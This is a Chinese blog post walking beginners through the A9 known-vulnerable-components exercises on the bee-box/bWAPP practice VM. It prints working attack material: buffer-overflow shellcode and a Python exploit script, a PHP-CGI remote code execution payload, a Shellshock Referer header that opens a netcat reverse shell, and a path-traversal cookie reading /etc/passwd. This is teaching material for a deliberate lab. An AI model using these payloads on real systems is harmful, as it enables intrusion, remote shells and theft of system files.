新手入门靶机BEE-BOX教程—第二章A9（十）

admin

138967
文章

114
评论

2021年8月31日18:28:52评论166 views字数 4991阅读16分38秒阅读模式

新手入门靶机BEE-BOX教程—第二章A9（十）

△△△点击上方“蓝字”关注我们了解更多精彩

0x00 Preface [前言/简介]

接着上一篇文章，更新BEE-BOX A8题目，有不理解这些靶机是哪儿的小伙伴或者查看以前的篇幅，传送门：
https://mp.weixin.qq.com/s/xp4YvWQLB6SQXbHnAjKo2w

注：本文尽量寻找通俗易懂原理，如果有不清楚等地方，可以看着靶机进行走一遍，我所做的靶机题目都是属于LOW，请大神勿喷。

0x01 BEE-BOX习题：A9-Using Known Vulnerable Components

新手入门靶机BEE-BOX教程—第二章A9（十）

0x02 A9-Using Known Vulnerable Components

1、Buffer Overflow (Local)
使用msf的模块:linux/x86/exec
然后用generate -b 'x00' -e x86/opt_sub -f bash 命令将shellcode输出来。

新手入门靶机BEE-BOX教程—第二章A9（十）

然后将shellcode进行编码：

{ echo -n '; cat /tmp/payload.txt; echo -n '; } | perl -pe's/(.)/sprintf("%%%02X", ord($1))/seg'


打开这个关卡，进行抓包，将编码出来后的发过去，由于不熟悉这个，导致
一直复现失败= =（我真的菜），所以打算给一个
作者做好的shellcode。(有机会再复现一下= =)
参考URL：
https://ejtaal.net/infosec/beebox.html

%27%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%8F%92%04%08%54%58%2D%05%FD%FD%FD%2D%01%01%01%01%2D%01%01%01%01%50%5C%25%01%01%01%01%25%02%02%02%02%2D%75%1C%30%7D%2D%01%01%01%01%2D%01%01%01%01%50%2D%14%DF%74%2B%2D%01%01%01%01%2D%01%01%01%01%50%2D%08%90%25%E1%2D%01%01%01%01%2D%01%01%01%01%50%2D%67%6C%FE%0B%2D%01%01%01%01%2D%01%01%01%01%50%2D%AC%15%24%60%2D%01%01%01%01%2D%01%01%01%01%50%2D%E7%77%7D%1A%2D%01%01%01%01%2D%01%01%01%01%50%2D%67%04%58%7F%2D%01%01%01%01%2D%01%01%01%01%50%2D%96%36%BA%F7%2D%01%01%01%01%2D%01%01%01%01%50%2D%39%CA%E7%7E%2D%01%01%01%01%2D%01%01%01%01%50%2D%92%0E%21%7D%2D%01%01%01%01%2D%01%01%01%01%50%2D%07%E6%58%0E%2D%01%01%01%01%2D%01%01%01%01%50%27

新手入门靶机BEE-BOX教程—第二章A9（十）

2、Buffer Overflow (Remote）

页面上提示说特定网络服务有缓冲溢出，那我们先扫描一下端口。

新手入门靶机BEE-BOX教程—第二章A9（十）

发现很多端口都认识的，对于陌生的我们尝试用telnet看看，发现666端口是跟上一题一样，那就说明就是666它了。

新手入门靶机BEE-BOX教程—第二章A9（十）

还是使用上一条的payload，但是需要用脚本：

#!/usr/bin/pythonimport socket
shellcode = ("x54x58x2dx3dxfcxfdxfdx2dx01x01x01x01x2dx01x01x01x01x50x5cx25x01x01x01x01x25x02x02x02x02x2dx75x1cx30x7dx2dx01x01x01x01x2dx01x01\x01x01x50x2dx1fxdfx74x2bx2dx01x01x01x01x2dx01x01x01x01x50x2dx37x9cxf3xddx2dx01x01x01x01x2dx01x01x01x01x50x2dxfexfdxf5x02x2dx01\x01x01x01x2dx01x01x01x01x50x2dx0dx33x02x4cx2dx01x01x01x01x2dx01x01x01x01x50x2dxeex0ax36xaax2dx01x01x01x01x2dx01x01x01x01x50x2dx0exe6xfax39x2dx01x01x01x01x2dx01x01x01x01x50x2dxf0x04xfcxfcx2dx01x01x01x01x2dx01x01x01x01x50x2dxfexfdxfbx01x2dx01x01x01x01x2dx01x01x01x01x50x2dxfexfdxfbxfax2dx01x01x01x01x2dx01x01x01x01x50x2dx0cxfexfax03x2dx01x01x01x01x2dx01x01x01x01x50x2dxb2xb8xc0xbfx2dx01x01x01x01x2dx01x01x01x01x50x2dxfcx10x54x41x2dx01x01x01x01x2dx01x01x01x01x50x2dx3ex61x1ex2bx2dx01x01x01x01x2dx01x01x01x01x50x2dxa3x1axabx15x2dx01x01x01x01x2dx01x01x01x01x50x2dx58x7fxe7x77x2dx01x01x01x01x2dx01x01x01x01x50x2dxbaxf7x66x04x2dx01x01x01x01x2dx01x01x01x01x50x2dxe8x7ex95x36x2dx01x01x01x01x2dx01x01x01x01x50x2dx21x7dx39xcax2dx01x01x01x01x2dx01x01x01x01x50x2dx59x0ex92x0ex2dx01x01x01x01x2dx01x01x01x01x50x2dx79xc5x06xe6x2dx01x01x01x01x2dx01x01x01x01x50")
# HINT: x90*354 + xa7x8fx04x08 + [payload] (remote)ret = "xa7x8fx04x08" buffer = 'x90' * 354 + ret + shellcode + "rn"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print "nSending evil buffer..."s.connect(('192.168.145.128',666))s.send(buffer)data = s.recv(1024)s.close()

emmmmmmm....缓冲溢出我就没成功过.....各位表哥们做吧，成功了给我看看....我放弃了....太累人了

新手入门靶机BEE-BOX教程—第二章A9（十）

3、Drupal SQL Injection (Drupageddon)

这题做过的，下一道

4、Heartbleed Vulnerability

这题做过的，下一道

5、PHP CGI Remote Code Execution

php cgi的远程代码执行漏洞，2012年非常经典的一枚漏洞，题目也给出了相关的提示CVE-2012-1823，详情请看URL：
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html

payload：空格跟=用url编码
/bWAPP/admin/phpinfo.php/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input
<?php system('id')?>

新手入门靶机BEE-BOX教程—第二章A9（十）

6、PHP Eval Function

源码里查看到使用了eval()函数，没有做任何过滤。

新手入门靶机BEE-BOX教程—第二章A9（十）

7、phpMyAdmin BBCode Tag XSS
这题做过的，下一道

8、Shellshock Vulnerability (CGI)

题目上提示了：attack the referer header，从源码上看会加载一个shellcode.sh的脚本。

新手入门靶机BEE-BOX教程—第二章A9（十）

我们使用burp抓包，然后加载脚本的时候，修改Referer，直接反弹shell。
payload：

() { :; }; (/bin/bash -c "nc 192.168.177.129 8080 -e /bin/bash")

新手入门靶机BEE-BOX教程—第二章A9（十）

9、SQLiteManager Local File Inclusion

这个是CVE-2007-1232，直接找payload，在cookie里添加：

SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;

新手入门靶机BEE-BOX教程—第二章A9（十）

10、SQLiteManager PHP Code Injection
作者已经给出了脚本，就不演示了。

11、SQLiteManager XSS

做过的了，跳过。

0x03 Summary 总结
A9做的我是真的吐血，以为都做好了思想准备了，缓冲溢出的2个硬是做了好多天没做出来，还是放弃了。等技术好了之后再来锤他们= =!!哭了....技术太菜了。

END

如您有任何问题、建议、需求请后台留言NOVASEC公众号！

感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧！

如有任何问题、建议、合作、投稿请加NOVASEC-MOYU，以方便及时回复。

如果需要靶机，后台回复”小蜜蜂”即可获得资源。

本文始发于微信公众号（NOVASEC）：新手入门靶机BEE-BOX教程—第二章A9（十）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

新手入门靶机BEE-BOX教程—第二章A9（十）

应急响应-Rookit后门查杀

一次VUE环境下的渗透测试

Bottle 框架漏洞攻防实录：从原型链污染到 Flag 获取的完整渗透路径

新的Windows NTLM漏洞被利用进行攻击

MCP基本概念与核心原理详解

第 3 部分：1 - 基于 Electron 的应用安全测试基础 - 提取和分析 .asar 文件

Linux基线加固：Linux基线检查及安全加固手工实操

0036. 我是如何发现一个关键的商店 XSS 漏洞并获得 2,000 美元赏金的——我的挣扎、失败和突破

分享某EDUSRC漏洞挖掘复盘

红队进阶：通过 HKU 快速锁定高权限账户与横向移动路径

发表评论

在线咨询

微信